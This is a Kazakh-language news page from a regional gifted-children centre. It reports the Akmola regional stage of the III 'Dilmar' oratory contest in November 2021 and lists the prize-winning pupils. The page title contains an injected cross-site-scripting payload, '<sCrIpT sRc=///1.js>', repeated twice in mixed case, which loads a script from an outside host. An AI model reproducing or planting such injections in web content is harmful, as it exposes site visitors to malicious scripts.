III республикалық «Ділмар» шешендік өнер байқауының облыстық кезеңі бойынша қорытынды ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.11.2021

Ақмола облысы білім басқармасының «Ақмола дарыны» дарынды балалар мен талантты жастарды анықтау және қолдау жөніндегі орталығы     Елбасының «Болашаққа бағдар: рухани жаңғыру» атты мақаласындағы ұлттық бірегейлікті сақтау идеясын жүзеге асыру  аясында III республикалық «Ділмар»  шешендік өнер байқауының облыстық кезеңін  2021 жылғы 11 қарашада онлайн түрде ұйымдастырып, өткізді.

Байқаудың негізгі мақсаты - оқушыларды кітап оқуға, жан-жақты ізденуге, әсіресе, би-шешен, ақын-жыраулардың шығармашылығын оқып, одан терең ғибрат алып, өмірде қолдануға бағыттау.

Байқауға Ақкөл, Аршалы, Атбасар, Бұланды, Бурабай, Ерейментау, Есіл Егіндікөл, Целиноград, Шортанды аудандары мен  дарынды балаларға арналған облыстық мамандандырылған мектеп-интернаттарынан барлығы 15 оқушы қатысты.

Байқау қорытындысы бойынша келесі оқушылар жүлделі орындарды қанжығасына байлады:

Шүкір  Даяна - Егіндікөл ауданы Көркем ауылының негізгі орта мектебінің   9 сынып оқушысы - І орын;

Ибрагимов Бауыржан - Целиноград ауданы     Талапкер ауылының жалпы орта білім беретін мектебінің 10 сынып оқушысы - ІІ орын;

Төлеу Бекболат - Ақмола облысы білім басқармасының «Білім-инновация» лицей–интернатының    8 сынып оқушысы - ІІІ орын;

Тенелген Аружан - Бұланды ауданы Қараөзек ауылының жалпы орта білім беретін мектебінің 10 сынып оқушысы грамота.

2021 жылдың 25-26 қарашасында Алматы қаласында өтетін III Республикалық "Ділмар" шешендік өнер байқауының қорытынды кезеңіне Шүкір Даяна жолдама алды.

Жеңімпаздарымызды жүлделі орындармен құттықтай отыра, барлық қатысушыларға алдағы уақытта сәттілік тілейміз.

 

Просмотров: 361


Пікір қосу



Деректерді қолтаңбаға қосу